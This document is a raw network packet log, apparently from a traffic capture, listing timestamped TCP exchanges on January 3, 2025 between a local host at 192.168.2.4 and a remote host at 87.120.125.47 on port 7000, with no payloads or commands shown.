                    Jan 3, 2025 14:08:34.444206953 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.449059010 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.459568977 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.464490891 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.521974087 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.526839972 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.584481955 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.589437962 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.622946978 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.624385118 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.670773029 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.716125011 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.717432976 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.722318888 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.740725040 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.745539904 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.803270102 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.808172941 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.809160948 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.810987949 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.862684965 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.862751007 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.867630959 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.894946098 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.896487951 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.946677923 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.989564896 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:34.991018057 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:34.995874882 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:35.084120035 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:35.085618973 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:35.091948986 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:35.177324057 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:35.178906918 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:35.184926033 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:35.184981108 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:35.192368031 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:47.694211960 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:47.699204922 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:47.867466927 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:47.869276047 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:47.874152899 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:48.428359032 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:48.433171034 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:48.601584911 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:48.602943897 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:48.607712030 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:49.100320101 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:49.105288982 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:49.289058924 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:49.297369003 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:49.302191973 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.287803888 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.294152975 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.303428888 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.308176994 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.397253990 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.402205944 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.412857056 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.417670965 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.459589958 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.461112022 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.464441061 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.464485884 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.469297886 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.491030931 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.495872021 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.522097111 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.526844025 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.551238060 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.552997112 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.602659941 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.602701902 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.607474089 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.615828037 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.620634079 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.631659985 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.636467934 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.644750118 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.646219969 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.694943905 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.694988012 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.699897051 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.709585905 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.714519978 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.723432064 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.725395918 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.771015882 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.772102118 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.777127981 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.801326036 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.802938938 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.850686073 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.850730896 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.858294964 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.896190882 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.897645950 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.902718067 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.902762890 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:50.908036947 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.989243031 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:50.995662928 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:51.000813961 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:51.007122040 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:51.011960030 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:51.087438107 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:51.088767052 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:51.093604088 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:51.093643904 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:51.098505974 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:53.162769079 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:53.167727947 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:53.336467028 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:53.342240095 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:53.347342968 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:54.757023096 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:54.761883020 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:54.930017948 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:54.931643963 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:54.936472893 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:55.678410053 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:55.683208942 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:55.851922035 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:55.858232975 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:55.862997055 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:55.981477022 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:56.021889925 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:58.038238049 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:58.043104887 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:58.211405993 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:08:58.258235931 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:08:58.263151884 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.881724119 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.886604071 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.897136927 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.901989937 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.912827015 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.917604923 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.928392887 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.933173895 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.944117069 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.949037075 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:00.991055965 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:00.995862961 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.006478071 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.011265039 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.022125959 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.026892900 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.037713051 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.042470932 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.136759043 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.138062000 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.142874002 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.223908901 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.225686073 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.230519056 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.230571985 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.235321999 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.317476988 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.322254896 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.327035904 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:01.327249050 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:01.332053900 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:06.303385973 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:06.308279037 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:06.476691008 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:06.478780031 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:06.483604908 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:11.147185087 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:11.152177095 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:11.325602055 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:11.330252886 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:11.336361885 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.162929058 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:13.167831898 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.240856886 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:13.245601892 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.336524963 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.344413042 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:13.349169016 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.436100960 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:13.440256119 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:13.445099115 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:20.054263115 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:20.059138060 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:20.229780912 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:20.233278036 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:20.238120079 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.303472042 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:21.308506012 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.336880922 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:21.341886044 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.476571083 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.484370947 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:21.489181042 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.576018095 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:21.580271006 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:21.585058928 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:25.225289106 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:25.230216026 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:25.399401903 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:25.403641939 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:25.408500910 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:25.944410086 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:25.992320061 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.069315910 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.074270010 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:27.100428104 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.105164051 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:27.337863922 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:27.338032007 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:27.338072062 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.339603901 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.344372988 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:27.344415903 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:27.349155903 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.209697962 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:37.214675903 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.382582903 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.388403893 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:37.393177986 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.522829056 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:37.527776957 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.699959040 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:37.704421997 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:37.709183931 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:38.100297928 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:38.105164051 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:38.299165964 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:38.304302931 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:38.309079885 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.022329092 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:47.027363062 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.195628881 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.197312117 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:47.202105045 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.381680965 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:47.386449099 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.555249929 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:47.558588982 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:47.563453913 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.475389957 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.480324984 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.648936033 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.650949001 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.655719042 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.662841082 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.667644024 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.694119930 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.698978901 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.709759951 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.714529991 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.772186995 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.777007103 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.787825108 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.792607069 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.803464890 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.808294058 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.944629908 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:52.946368933 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:52.951124907 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.037945986 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.039247990 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:53.044435978 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.044481993 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:53.049662113 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.262099028 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.263432026 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:53.268213987 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:53.268265009 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:09:53.273133039 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:55.941741943 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:09:55.992388964 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:02.412970066 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:02.417853117 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:02.589169979 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:02.591056108 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:02.595844984 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:02.866190910 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:02.871062994 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:02.881937027 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:02.886919022 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:03.048695087 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:03.050257921 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:03.057060957 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:03.141843081 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:03.143436909 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:03.148576021 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.022377014 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.027226925 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.131850004 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.136750937 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.178540945 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.183330059 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.195538998 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.203880072 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.250699043 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.322235107 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.323976040 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.328727961 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.415532112 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:13.417056084 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:13.421822071 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:22.491461992 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:22.496253014 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:22.664731979 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:22.666304111 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:22.671164036 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:24.428664923 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:24.435165882 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:24.610608101 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:24.612694025 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:24.617470980 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:25.942800045 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:25.992396116 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.538135052 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.543016911 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.631721973 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.636612892 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.647265911 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.652137041 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.662950993 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.667853117 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.711534023 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.713527918 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.718365908 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.788079977 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.793051958 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.809849024 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.811491966 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.858639002 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.903053999 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.904303074 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:34.909064054 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.995920897 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:34.997325897 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:35.002484083 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:35.088920116 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:35.091152906 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:35.095947981 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:44.929065943 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:44.933969021 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.022392035 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.027885914 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.053906918 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.059375048 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.069839001 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.075206995 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.120045900 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.121618986 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.126370907 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.213397980 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.218477964 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.223381996 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.310161114 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.311654091 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.316414118 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.403173923 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:45.405750990 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:45.410511971 CET70004973187.120.125.47192.168.2.4
